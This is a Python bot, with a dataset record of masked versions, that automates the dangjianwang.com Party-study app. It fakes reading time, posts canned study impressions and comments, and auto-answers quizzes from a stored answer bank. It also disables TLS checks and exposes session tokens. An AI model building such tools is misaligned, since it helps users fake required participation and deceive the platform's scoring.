                'mid': mid,
                'token': self.token,
                'appid': self.appid,
            }
            commitUrl = 'https://mapi.dangjianwang.com/v3_1/Study/GetFeelingsNum'
            rjson = self.session.post(url=commitUrl,
                                      data=data,
                                      verify=False).json()
            # print(rjson)
            log = '学习post3:{}'.format(rjson)
            self.writeLog2File(log)
            print(log)
        def get1():
            # Scrape the material page and pick a random <p> paragraph to
            # submit as the study impression.
            url = 'https://mapi.dangjianwang.com/v3_1/Study/MaterialDetail?token={}&mid={}'.format(self.token, mid)
            rjson = self.session.get(url=url)
            text = rjson.content
            soup = BeautifulSoup(text, 'html.parser')
            retContents = []
            for div in soup.find_all('p'):
                p = div.text.strip()
                # NOTE(review): `100 > len(p) < 200` evaluates as
                # `100 > len(p) and len(p) < 200`, i.e. just len(p) < 100;
                # possibly 100 < len(p) < 200 was intended — confirm.
                retContents.append(p if 100 > len(p) < 200 else p[0:200])
            return random.choice(retContents)
        def recordFeeling(content=None):
            # Submit the impression; on code 1120 (duplicate content) retry
            # with a random sentence appended.
            if not content:
                content = '伟大的时代造就伟大的人物。邓小平同志就是从中国人民和中华民族近代以来伟大斗争中产生的伟人,' \
                          '是我们大家衷心热爱的伟人。我们很多同志都曾经在他的领导和指导下工作过,他的崇高风范对我们来说是那样熟悉、那样亲切。' \
                          '邓小平同志崇高鲜明又独具魅力的革命风范,将激励我们在实现“两个一百年”奋斗目标、实现中华民族伟大复兴中国梦的征程上奋勇前进。'
            data = {
                'mid': mid,
                'token': self.token,
                'appid': self.appid,
                'content': content
            }
            commitUrl = 'https://mapi.dangjianwang.com/v3_1/Study/RecordFeeling'
            rjson = self.session.post(url=commitUrl,
                                      data=data,
                                      verify=False).json()
            # print(rjson)
            log = '学习recordFeeling:{}'.format(rjson)
            self.writeLog2File(log)
            print('in recordFeeling')
            print(log)
            if rjson['code'] == '200':
                return {'content': content}
            elif rjson['code'] == '1120':
                addtion = [
                    '我们必须坚定不移,任何时候任何情况下都不能动摇',
                    '人民有信心,国家才有未来,国家才有力量。',
                    '新时代,属于自强不息、勇于创造的奋斗者。',
                    '民主政治建设有序推进,依法治市迈出新步伐。',
                    '一切公职人员,都必须牢记始终为人民利益和幸福而努力工作。',
                ]
                return recordFeeling(content= '{}\n{}'.format(content, random.choice(addtion)))
            else:
                # NOTE(review): returning None makes the caller's
                # studyRsults.update(None) raise TypeError — confirm.
                return None
        # Record the submitted impression, then report the reading time.
        def readTime():
            # Report the reading duration; success completes the session.
            data = {
                'mid': mid,
                'token': self.token,
                'appid': self.appid,
                'time': interval,
            }
            commitUrl = 'https://mapi.dangjianwang.com/v3_1/Study/ReadTime'
            rjson = self.session.post(url=commitUrl,
                                      data=data,
                                      verify=False).json()
            # print(rjson)
            log = '学习readTime:{}'.format(rjson)
            # self.studyRsults.update({'学习readTime', rjson})
            self.writeLog2File(log)
            print(log)
        post1()
        time.sleep(1)
        post2()
        time.sleep(1)
        post3()
        time.sleep(1)
        content = get1()
        time.sleep(1)
        # time.sleep(interval)
        count = 0
        print('开始学习请稍后')
        # Busy-wait in 1s steps so progress can be printed every 30s.
        for i in range(interval):
            count += 1
            # print(i + 1)
            if count % 30 == 0:
                print('已用时{}秒'.format(count))
            time.sleep(1)
        # time.sleep(5)
        print('填写的学习体会', content)
        self.studyRsults.update(recordFeeling(content=content))
        time.sleep(1)
        readTime()
        time.sleep(1)
        pass
    def doExam(self):
        '''
        Take one online quiz: list the exams and question banks, draw a random
        paper from bank 6, answer every question from the local Qa table, and
        hand the paper in.
        :param self:
        :return: None (prints results; accumulates examlist/examC19Info/qaList)
        '''
        ids = []
        data = {
            'page': '1',
            'page_size': '20',
            'token': self.token,
            'appid': self.appid,
        }
        examlistUrl = 'https://mapi.dangjianwang.com/v3_1/quora/examlist'
        rjson = self.session.post(url=examlistUrl,
                                  data=data,
                                  verify=False).json()
        # print(rjson)
        # for i in rjson['data']:
        #     print(i)
        time.sleep(0.3)
        #########################################################
        print('*' * 99)
        data = {
            'page': '1',
            'page_size': '20',
            'token': self.token,
            'appid': self.appid,
        }
        banklistUrl = 'https://mapi.dangjianwang.com/v3_1/exam/banklist'
        rjson = self.session.post(url=banklistUrl,
                                  data=data,
                                  verify=False).json()
        # print(rjson)
        # Collect all banks; remember the 19th-congress single-choice bank.
        for i in rjson['data']:
            tem = (i['bank_name'], i['id'])
            self.examlist.append(tem)
            if i['bank_name'] == '十九大报告100题(单选)':
                # if i['bank_num'] == '65':
                temp = {
                    'title': i['bank_name'],
                    'detail': i['detail'],
                    'id': i['id'],
                }
                self.examC19Info.append(temp)
        # print(self.examC19Info)
        # print(self.examlist)
        time.sleep(0.3)
        #########################################################
        print('*' * 99)
        # Draw a random paper from bank 6.
        data = {
            'bank': '6',
            'token': self.token,
            'appid': self.appid,
        }
        commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'
        rjson = self.session.post(url=commitUrl,
                                  data=data,
                                  verify=False).json()
        # print(rjson)
        aa = rjson['data']
        # Paper id is required when handing the paper in.
        paper = aa['id']
        for i in aa['questions']:
            temp = {'id': i['id'], 'content': i['content']}
            ids.append(temp)
        #########################################################
        print('*' * 99)
        time.sleep(0.5)
        # Answer the questions and hand in the paper.
        answers = []
        # Look up the answers first.
        for i in ids:
            # Answer comes from the local database (Django Qa model).
            correctAnswer = Qa.objects.filter(question__contains=i['content'])[0]
            answerText = correctAnswer.answerText
            answer = correctAnswer.answer
            # Alternative: answers from a file.
            # answerText = getAnswer(i['content'])[2]
            # answer = getAnswer(i['content'])[1]
            temp = {'index': i['id'], 'answer': answer}
            qa = {'index': i['id'], 'answer': answer, 'answerText': answerText}
            self.qaList.append(qa)
            print(qa, i['content'])
            answers.append(temp)
            time.sleep(1)
        hdata = {
            'token': self.token,
            'appid': self.appid,
            'paper': paper,
            # NOTE(review): `json` is not imported explicitly in this chunk —
            # presumably provided by the wildcard djfuncs import; confirm.
            'answers': json.dumps(answers),
            # 'answers': [{'answer': 'A', 'index': '639'}, {'answer': 'A', 'index': '639'}],
        }
        # print('hdata:', hdata)
        commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/handpaper'
        rjson = self.session.post(url=commitUrl,
                                  data=hdata,
                                  verify=False).json()
        print(rjson)
        print(self.examlist)
        print(self.examC19Info)
        print(self.qaList)
def getAnswerInfo(self):
'''
获得答题的结果与正确率
:return:
'''
data = {
'token': self.token,
'appid': self.appid,
'page_size': '20',
'page_index': 'page_index',
}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'
rjson = self.session.post(url=commitUrl,
data=data,
verify=False).json()
print(rjson)
'''
https://mapi.dangjianwang.com/v3_1/exam/randexam 答题地址 主id是交卷的paper 这里要获取到questions里的id 等于回答问题中的index
appid TJZHDJ01
bank 6
token 5jTY47PbPZ0KdUprwmfJVfH4cX23tyDcV25XrEYkWVvElH3YjJpIb1JCDwq_
https://mapi.dangjianwang.com/v3_1/exam/handpaper 交卷的连接
appid TJZHDJ01
answers [{"index":"635","answer":"D"},{"index":"640","answer":"C"},{"index":"641","answer":"B"},{"index":"665","answer":"B"},{"index":"670","answer":"B"},{"index":"673","answer":"B"},{"index":"677","answer":"C"},{"index":"682","answer":"B"},{"index":"684","answer":"C"},{"index":"690","answer":"A"}]
token 5jTY47PbPZ0KdUprwmfJVfH4cX23tyDcV25XrEYkWVvElH3YjJpIb1JCDwq_
paper 4565894
https://mapi.dangjianwang.com/v3_1/exam/banklist 获得答题情况的连接
appid TJZHDJ01
page_size 20
token 5jTY47PbPZxXeRxlkzScAPWidyvssy3TBD5Y9UYiCQnMmCfa2pRNb1JCDwq_
page_index 1
--------------------------------------------------
https://mapi.dangjianwang.com/v3_1/Study/MaterialCollList 学习的id列表
appid TJZHDJ01
page_size 20
type_id 791
token 5jTY47PbPZJbeh9ixjfOUvaoI3604SrSAz5Zokt3DAmfz3qIis4Yb1JCDwq_
page_index 1
下面是针对791id列表中的访问地址
https://mapi.dangjianwang.com/v3_1//Study/CheckCollStatus
post1:
appid TJZHDJ01
mid 9729
token 5jTY47PbPZoOKEUwlDCaAKWqICGwt3_OVzlVpk5yW1bMyS_M3J5Db1JCDwq_
post2:
https://mapi.dangjianwang.com/v3_1/Login/CheckToken
appid TJZHDJ01
token 5jTY47PbPZoOKEUwlDCaAKWqICGwt3_OVzlVpk5yW1bMyS_M3J5Db1JCDwq_
post3:
https://mapi.dangjianwang.com/v3_1/Study/GetFeelingsNum
appid TJZHDJ01
mid 9729
token 5jTY47PbPZoOKEUwlDCaAKWqICGwt3_OVzlVpk5yW1bMyS_M3J5Db1JCDwq_
get1 https://mapi.dangjianwang.com/v3_1/Study/MaterialDetail?token={}&mid={} 获得页面
post 发表体会
https://mapi.dangjianwang.com/v3_1/Study/RecordFeeling
appid TJZHDJ01
content 伟大的时代造就伟大的人物。邓小平同志就是从中国人民和中华民族近代以来伟大斗争中产生的伟人,是我们大家衷心热爱的伟人。我们很多同志都曾经在他的领导和指导下工作过,他的崇高风范对我们来说是那样熟悉、那样亲切。邓小平同志崇高鲜明又独具魅力的革命风范,将激励我们在实现“两个一百年”奋斗目标、实现中华民族伟大复兴中国梦的征程上奋勇前进。
mid 9729
token 5jTY47PbPckOdUlllmfOCaCvcy7ls3rSVmxRoE0gDg3EmyrYi5Ucb1JCDwq_
post 结束学习
https://mapi.dangjianwang.com/v3_1/Study/ReadTime
appid TJZHDJ01
time 362
mid 9729
token 5jTY47PbPckOdUlllmfOCaCvcy7ls3rSVmxRoE0gDg3EmyrYi5Ucb1JCDwq_
---------------------------------------
https://mapi.dangjianwang.com/v3_1/Help/List 这里获得帮助id
https://mapi.dangjianwang.com/v3_1/Help/PostComment 提交评论的地址
appid TJZHDJ01
content 不忘初心,牢记使命!
id 55984
token 5jTY47PbPcpZe0s1xDLKAqKoIimx6SnSVjcApB92DF3Nmy/djZ1Nb1JCDwq_
把党的政治建设摆在首位!
不忘初心,牢记使命!
-------------------------------
发布的内容
https://mapi.dangjianwang.com/v3_1/Viewpoint/Create
appid TJZHDJ01
content 不忘初心牢记使命
token 5jTY47PbPZ9deR5rkTXIB/b/fymw5HvbAj9R900gDArNnXqE1s9Kb1JCDwq_
不忘初心,牢记使命,坚持终身学习!
全面的小康,覆盖的人口要全面,是惠及全体人民的小康。
-----------------------------
点赞错误
{'msg': '重复评论过多,请您修改后重新提交。', 'code': '500'}
'''
|
flexible
|
{
"blob_id": "55a26eb2625acb201677f5ff50fde809402c9b93",
"index": 2630,
"step-1": "<mask token>\n\n\nclass Runner:\n\n def __init__(self, appid='TJZHDJ01', username='', password=''):\n urllib3.disable_warnings()\n self.currentTime = datetime.datetime.now().strftime('%H:%M:%S')\n self.username = username\n self.password = password\n self.thumbedFilePath = './lib/'.format(username)\n self.logFilePath = './log/'.format(username)\n self.errFilePath = './err/'.format(username)\n self.thumbedFileList = []\n self.debug = True\n self.session = requests.session()\n self.appid = appid\n self.headers = {'User-Agent':\n 'Dalvik/2.1.0 (Linux; U; Android 6.0; HUAWEI MLA-AL10 Build/HUAWEIMLA-AL10)'\n , 'header_version': '80', 'system': 'android', 'Connection':\n 'Keep-Alive', 'Host': 'mapi.dangjianwang.com'}\n self.token = self.getToken()\n time.sleep(0.1)\n self.thumbPageList = self.getPages(urls=[\n 'https://mapi.dangjianwang.com/v3_1/Learn/List',\n 'https://mapi.dangjianwang.com/v3_1/Activities/List',\n 'https://mapi.dangjianwang.com/v3_1/Hotspots/Hotlist'])\n self.thumbPages = [i[1] for i in self.thumbPageList]\n time.sleep(0.1)\n self.helpPageList = self.getPages(urls=[\n 'https://mapi.dangjianwang.com/v3_1/Help/List'])\n self.helpPages = [i[1] for i in self.helpPageList]\n self.helpResults = {}\n time.sleep(0.1)\n self.studyPageList = self.getPagesII(urls=[\n 'https://mapi.dangjianwang.com/v3_1/Study/MaterialCollList'])\n self.studyPages = [i[1] for i in self.studyPageList]\n time.sleep(0.1)\n self.studyRsults = {}\n self.thumbedPages = []\n self.thumbResults = {}\n self.helpedPages = []\n self.multiThumbed = []\n self.viewsResults = []\n self.examC19Info = []\n self.examlist = []\n self.qaList = []\n <mask token>\n\n def writeErr2File(self, err):\n path = self.logFilePath\n fullPath = '{}{}err.txt'.format(path, self.username)\n if not os.path.exists(path):\n os.mkdir(path)\n with open(fullPath, 'a') as f:\n f.write('{}:{}\\n'.format(self.currentTime, err))\n print('err已经写入{}'.format(fullPath))\n\n def writeLog2File(self, log):\n path = 
self.logFilePath\n fullPath = '{}{}logs.txt'.format(path, self.username)\n if not os.path.exists(path):\n os.mkdir(path)\n with open(fullPath, 'a') as f:\n f.write('{}:{}\\n'.format(self.currentTime, log))\n print('log已经写入{}'.format(fullPath))\n <mask token>\n\n def getThumbFromFile(self):\n \"\"\"\n\n :return: 文件中id组成的列表\n \"\"\"\n path = self.thumbedFilePath\n inFileList = []\n fullPath = '{}{}thumbs.txt'.format(path, self.username)\n if not os.path.exists(fullPath):\n return fullPath\n with open(fullPath, 'r') as f:\n inFileList.extend(list(set(f.readlines()[0].split(','))))\n with open(fullPath, 'w') as f1:\n f1.write(','.join(sorted(inFileList)))\n return inFileList\n\n def getExcuteTimes(self):\n \"\"\"\n 返回点赞等自动执行的次数的字典\n :return:\n \"\"\"\n excuteTimes = {}\n credInfo = self.getCredItinfo()\n print(credInfo)\n currentScore = credInfo[0]\n thumbScore = credInfo[1]['信息评论'].split('/')[0]\n thumbExcuteTimes = 10 - int(thumbScore)\n excuteTimes.update({'thumb': thumbExcuteTimes})\n helpScore = credInfo[1]['互助广场回答'].split('/')[0]\n helpExctuteTimes = 2 - int(helpScore)\n excuteTimes.update({'help': helpExctuteTimes})\n viewScore = credInfo[1]['党员视角发布'].split('/')[0]\n viewExcuteTimes = int((4 - int(viewScore)) / 2)\n excuteTimes.update({'view': viewExcuteTimes})\n examScore = credInfo[1]['在线知识竞答'].split('/')[0]\n examExcuteTimes = int((4 - int(examScore)) / 2)\n excuteTimes.update({'exam': examExcuteTimes})\n flag = int(credInfo[1]['在线阅读学习资料'].split('/')[1]) - int(credInfo[1]\n ['在线阅读学习资料'].split('/')[0])\n flag1 = int(credInfo[1]['学习资料写体会'].split('/')[1]) - int(credInfo[1]\n ['学习资料写体会'].split('/')[0])\n examExcuteTimes = 1 if flag != 0 or flag1 != 0 else 0\n excuteTimes.update({'study': examExcuteTimes})\n return excuteTimes\n\n def getToken(self):\n \"\"\"\n 获得一个连接的token\n 每个连接都需要使用到\n :return:\n \"\"\"\n data = {'appid': self.appid, 'username': self.username, 'password':\n self.password}\n longinurl = 'https://mapi.dangjianwang.com/v3_1/login'\n r = 
self.session.post(url=longinurl, data=data, verify=False)\n rjson = r.json()\n if rjson['code'] == '200':\n return rjson['token']\n else:\n print('token 获得失败')\n return None\n\n def getRJson(self, url):\n data = {'token': self.token, 'appid': self.appid}\n return self.session.post(url=url, data=data, verify=False).json()\n\n def getUserInfo(self):\n \"\"\"\n 获得一大串用户的信息,暂时没用\n :return:\n \"\"\"\n infoUrl = 'https://mapi.dangjianwang.com/v3_1/User/UserInfo'\n return self.getRJson(url=infoUrl)\n\n def getCredItinfoToday(self):\n \"\"\"\n 获得人员当前的得分等级参数\n :return:\n \"\"\"\n creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'\n info = self.getRJson(url=creditInfourl)\n fullScore = info['data']['full']\n gainScore = info['data']['gain']\n currentLevel = info['data']['level']\n username = info['data']['name']\n ret = {'fullScore': fullScore, 'gainScore': gainScore,\n 'currentLevel': currentLevel, 'username': username}\n return ret\n <mask token>\n\n def getPages(self, urls):\n pages = []\n for url in urls:\n data = self.getRJson(url=url)\n for k, v in data.items():\n if k == 'data':\n for i in v:\n pages.append((i['title'], i['id']))\n return pages\n\n def getPagesII(self, urls):\n\n def getRJson(url):\n data = {'token': self.token, 'appid': self.appid, 'type_id':\n '791', 'page_index': '1'}\n return self.session.post(url=url, data=data, verify=False).json()\n pages = []\n for url in urls:\n data = getRJson(url=url)\n for k, v in data.items():\n if k == 'data':\n for i in v:\n pages.append((i['name'], i['id']))\n return pages\n\n def doThumb(self, id):\n \"\"\"\n 点赞函数,操作与id对应的页面\n 每次记录对应的信息到文件\n :return:\n \"\"\"\n contents = ['关注', '关注!', '关注!!']\n data = {'id': id, 'comment': random.choice(contents), 'token': self\n .token, 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Activities/CommentAct'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n print(rjson)\n if rjson['code'] == '1003':\n self.token = 
self.getToken()\n elif rjson['code'] == '200':\n result = rjson['msg']\n if result == '操作成功':\n self.thumbedPages.append(id)\n for i in list(set(self.thumbPageList)):\n if id == i[1]:\n temp = {'title': i[0]}\n self.thumbResults.update(temp)\n log = '信息点赞:\\n主题: {}\\n提交:{}'.format(i[0], data[\n 'comment'])\n detail = '{} 主题:{}\\n回复:{}\\n'.format(self.\n getCurrentTime(), i[0], data['comment'])\n write2File(self, './results/', 'result.txt', log)\n thumbInfo = {'title': i[0], 'reply': data['comment']}\n self.thumbPages.remove(id)\n self.writeThumb2File(id=id)\n return detail, thumbInfo\n elif rjson['code'] == '500' and rjson['msg'] == '评论过快,请求休息一会':\n print('因评论过快,等待一段时间')\n time.sleep(20)\n else:\n print('rjson', rjson)\n self.thumbedPages.remove(id)\n self.writeThumb2File(id=id)\n log = '点赞:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n time.sleep(10)\n\n def doHelp(self, id, callback=None):\n \"\"\"\n 互助功能\n :param id:\n :return:\n \"\"\"\n detail = ''\n helpInfo = None\n log = ''\n content = ['把党的政治建设摆在首位!', '不忘初心,牢记使命!', '发展史第一要务,人才是第一资源,创新是第一动力。',\n '要把党的领导贯彻到依法治国全过程和各方面', '毫不动摇坚持中国共产党领导']\n data = {'id': id, 'content': random.choice(content), 'token': self.\n token, 'appid': self.appid}\n print(data)\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Help/PostComment'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n if rjson['code'] == '200':\n result = rjson['msg']\n if result == '操作成功':\n self.helpedPages.append(id)\n self.helpPages.remove(id)\n for i in self.helpPageList:\n if id == i[1]:\n curTime = self.getCurrentTime()\n self.helpResults.update({'title': id[0]})\n log = '互助:\\n主题: {}\\n提交内容: {}'.format(i[0], rjson[\n 'comment'])\n write2File(self, './results/', 'result.txt', log)\n detail = '{} 主题: {}\\n提交内容: {}\\n'.format(curTime, i[\n 0], rjson['comment'].strip())\n helpInfo = {'title': i[0], 'reply': rjson['comment']}\n else:\n pass\n else:\n pass\n log = '帮助:{}'.format(rjson)\n self.writeLog2File(log)\n 
print(log)\n return detail, log, helpInfo\n\n def doView(self):\n \"\"\"\n 党员视角发布功能\n\n :return:\n \"\"\"\n content = ['全面的小康,覆盖的人口要全面,是惠及全体人民的小康。', '不忘初心,牢记使命,坚持终身学习!']\n data = {'content': random.choice(content), 'token': self.token,\n 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Viewpoint/Create'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n if rjson['code'] == '200':\n result = rjson['msg']\n if result == '操作成功':\n self.viewsResults.append(1)\n else:\n pass\n log = '党员视角:{}'.format(rjson)\n detail = '{} 党员视角:\\n发布内容:{}\\n'.format(self.getCurrentTime(), rjson[\n 'data']['content'])\n publicContent = rjson['data']['content']\n return detail, publicContent\n\n def doStudy(self, mid):\n \"\"\"\n 前三个post函数的响应的三个请求\n get用来获得填写的内容\n 最后一个post是学习完离开并检测时间的函数如果成功说明该次学习成功。\n :param mid:\n :return:\n \"\"\"\n interval = 60 * 5 + 5\n\n def post1():\n data = {'mid': mid, 'token': self.token, 'appid': self.appid}\n commitUrl = (\n 'https://mapi.dangjianwang.com/v3_1//Study/CheckCollStatus')\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习post1:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n\n def post2():\n data = {'token': self.token, 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Login/CheckToken'\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习post2:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n\n def post3():\n data = {'mid': mid, 'token': self.token, 'appid': self.appid}\n commitUrl = (\n 'https://mapi.dangjianwang.com/v3_1/Study/GetFeelingsNum')\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习post3:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n\n def get1():\n url = (\n 'https://mapi.dangjianwang.com/v3_1/Study/MaterialDetail?token={}&mid={}'\n .format(self.token, mid))\n rjson = self.session.get(url=url)\n text = rjson.content\n 
soup = BeautifulSoup(text, 'html.parser')\n retContents = []\n for div in soup.find_all('p'):\n p = div.text.strip()\n retContents.append(p if 100 > len(p) < 200 else p[0:200])\n return random.choice(retContents)\n\n def recordFeeling(content=None):\n if not content:\n content = (\n '伟大的时代造就伟大的人物。邓小平同志就是从中国人民和中华民族近代以来伟大斗争中产生的伟人,是我们大家衷心热爱的伟人。我们很多同志都曾经在他的领导和指导下工作过,他的崇高风范对我们来说是那样熟悉、那样亲切。邓小平同志崇高鲜明又独具魅力的革命风范,将激励我们在实现“两个一百年”奋斗目标、实现中华民族伟大复兴中国梦的征程上奋勇前进。'\n )\n data = {'mid': mid, 'token': self.token, 'appid': self.appid,\n 'content': content}\n commitUrl = (\n 'https://mapi.dangjianwang.com/v3_1/Study/RecordFeeling')\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习recordFeeling:{}'.format(rjson)\n self.writeLog2File(log)\n print('in recordFeeling')\n print(log)\n if rjson['code'] == '200':\n return {'content': content}\n elif rjson['code'] == '1120':\n addtion = ['我们必须坚定不移,任何时候任何情况下都不能动摇',\n '人民有信心,国家才有未来,国家才有力量。', '新时代,属于自强不息、勇于创造的奋斗者。',\n '民主政治建设有序推进,依法治市迈出新步伐。', '一切公职人员,都必须牢记始终为人民利益和幸福而努力工作。']\n return recordFeeling(content='{}\\n{}'.format(content,\n random.choice(addtion)))\n else:\n return None\n\n def readTime():\n data = {'mid': mid, 'token': self.token, 'appid': self.appid,\n 'time': interval}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Study/ReadTime'\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习readTime:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n post1()\n time.sleep(1)\n post2()\n time.sleep(1)\n post3()\n time.sleep(1)\n content = get1()\n time.sleep(1)\n count = 0\n print('开始学习请稍后')\n for i in range(interval):\n count += 1\n if count % 30 == 0:\n print('已用时{}秒'.format(count))\n time.sleep(1)\n print('填写的学习体会', content)\n self.studyRsults.update(recordFeeling(content=content))\n time.sleep(1)\n readTime()\n time.sleep(1)\n pass\n\n def doExam(self):\n \"\"\"\n\n :param self:\n :return:\n \"\"\"\n ids = []\n data = {'page': '1', 'page_size': '20', 'token': 
self.token,\n 'appid': self.appid}\n examlistUrl = 'https://mapi.dangjianwang.com/v3_1/quora/examlist'\n rjson = self.session.post(url=examlistUrl, data=data, verify=False\n ).json()\n time.sleep(0.3)\n print('*' * 99)\n data = {'page': '1', 'page_size': '20', 'token': self.token,\n 'appid': self.appid}\n banklistUrl = 'https://mapi.dangjianwang.com/v3_1/exam/banklist'\n rjson = self.session.post(url=banklistUrl, data=data, verify=False\n ).json()\n for i in rjson['data']:\n tem = i['bank_name'], i['id']\n self.examlist.append(tem)\n if i['bank_name'] == '十九大报告100题(单选)':\n temp = {'title': i['bank_name'], 'detail': i['detail'],\n 'id': i['id']}\n self.examC19Info.append(temp)\n time.sleep(0.3)\n print('*' * 99)\n data = {'bank': '6', 'token': self.token, 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n aa = rjson['data']\n paper = aa['id']\n for i in aa['questions']:\n temp = {'id': i['id'], 'content': i['content']}\n ids.append(temp)\n print('*' * 99)\n time.sleep(0.5)\n answers = []\n for i in ids:\n correctAnswer = Qa.objects.filter(question__contains=i['content'])[\n 0]\n answerText = correctAnswer.answerText\n answer = correctAnswer.answer\n temp = {'index': i['id'], 'answer': answer}\n qa = {'index': i['id'], 'answer': answer, 'answerText': answerText}\n self.qaList.append(qa)\n print(qa, i['content'])\n answers.append(temp)\n time.sleep(1)\n hdata = {'token': self.token, 'appid': self.appid, 'paper': paper,\n 'answers': json.dumps(answers)}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/handpaper'\n rjson = self.session.post(url=commitUrl, data=hdata, verify=False\n ).json()\n print(rjson)\n print(self.examlist)\n print(self.examC19Info)\n print(self.qaList)\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Runner:\n\n def __init__(self, appid='TJZHDJ01', username='', password=''):\n urllib3.disable_warnings()\n self.currentTime = datetime.datetime.now().strftime('%H:%M:%S')\n self.username = username\n self.password = password\n self.thumbedFilePath = './lib/'.format(username)\n self.logFilePath = './log/'.format(username)\n self.errFilePath = './err/'.format(username)\n self.thumbedFileList = []\n self.debug = True\n self.session = requests.session()\n self.appid = appid\n self.headers = {'User-Agent':\n 'Dalvik/2.1.0 (Linux; U; Android 6.0; HUAWEI MLA-AL10 Build/HUAWEIMLA-AL10)'\n , 'header_version': '80', 'system': 'android', 'Connection':\n 'Keep-Alive', 'Host': 'mapi.dangjianwang.com'}\n self.token = self.getToken()\n time.sleep(0.1)\n self.thumbPageList = self.getPages(urls=[\n 'https://mapi.dangjianwang.com/v3_1/Learn/List',\n 'https://mapi.dangjianwang.com/v3_1/Activities/List',\n 'https://mapi.dangjianwang.com/v3_1/Hotspots/Hotlist'])\n self.thumbPages = [i[1] for i in self.thumbPageList]\n time.sleep(0.1)\n self.helpPageList = self.getPages(urls=[\n 'https://mapi.dangjianwang.com/v3_1/Help/List'])\n self.helpPages = [i[1] for i in self.helpPageList]\n self.helpResults = {}\n time.sleep(0.1)\n self.studyPageList = self.getPagesII(urls=[\n 'https://mapi.dangjianwang.com/v3_1/Study/MaterialCollList'])\n self.studyPages = [i[1] for i in self.studyPageList]\n time.sleep(0.1)\n self.studyRsults = {}\n self.thumbedPages = []\n self.thumbResults = {}\n self.helpedPages = []\n self.multiThumbed = []\n self.viewsResults = []\n self.examC19Info = []\n self.examlist = []\n self.qaList = []\n <mask token>\n\n def writeErr2File(self, err):\n path = self.logFilePath\n fullPath = '{}{}err.txt'.format(path, self.username)\n if not os.path.exists(path):\n os.mkdir(path)\n with open(fullPath, 'a') as f:\n f.write('{}:{}\\n'.format(self.currentTime, err))\n print('err已经写入{}'.format(fullPath))\n\n def writeLog2File(self, log):\n path = 
self.logFilePath\n fullPath = '{}{}logs.txt'.format(path, self.username)\n if not os.path.exists(path):\n os.mkdir(path)\n with open(fullPath, 'a') as f:\n f.write('{}:{}\\n'.format(self.currentTime, log))\n print('log已经写入{}'.format(fullPath))\n\n def writeThumb2File(self, id):\n path = self.thumbedFilePath\n fullPath = '{}{}thumbs.txt'.format(path, self.username)\n if not os.path.exists(path):\n os.mkdir(path)\n with open(fullPath, 'a') as f:\n f.write(',{}'.format(id))\n print('点赞记录已经写入{}'.format(fullPath))\n\n def getThumbFromFile(self):\n \"\"\"\n\n :return: 文件中id组成的列表\n \"\"\"\n path = self.thumbedFilePath\n inFileList = []\n fullPath = '{}{}thumbs.txt'.format(path, self.username)\n if not os.path.exists(fullPath):\n return fullPath\n with open(fullPath, 'r') as f:\n inFileList.extend(list(set(f.readlines()[0].split(','))))\n with open(fullPath, 'w') as f1:\n f1.write(','.join(sorted(inFileList)))\n return inFileList\n\n def getExcuteTimes(self):\n \"\"\"\n 返回点赞等自动执行的次数的字典\n :return:\n \"\"\"\n excuteTimes = {}\n credInfo = self.getCredItinfo()\n print(credInfo)\n currentScore = credInfo[0]\n thumbScore = credInfo[1]['信息评论'].split('/')[0]\n thumbExcuteTimes = 10 - int(thumbScore)\n excuteTimes.update({'thumb': thumbExcuteTimes})\n helpScore = credInfo[1]['互助广场回答'].split('/')[0]\n helpExctuteTimes = 2 - int(helpScore)\n excuteTimes.update({'help': helpExctuteTimes})\n viewScore = credInfo[1]['党员视角发布'].split('/')[0]\n viewExcuteTimes = int((4 - int(viewScore)) / 2)\n excuteTimes.update({'view': viewExcuteTimes})\n examScore = credInfo[1]['在线知识竞答'].split('/')[0]\n examExcuteTimes = int((4 - int(examScore)) / 2)\n excuteTimes.update({'exam': examExcuteTimes})\n flag = int(credInfo[1]['在线阅读学习资料'].split('/')[1]) - int(credInfo[1]\n ['在线阅读学习资料'].split('/')[0])\n flag1 = int(credInfo[1]['学习资料写体会'].split('/')[1]) - int(credInfo[1]\n ['学习资料写体会'].split('/')[0])\n examExcuteTimes = 1 if flag != 0 or flag1 != 0 else 0\n excuteTimes.update({'study': examExcuteTimes})\n 
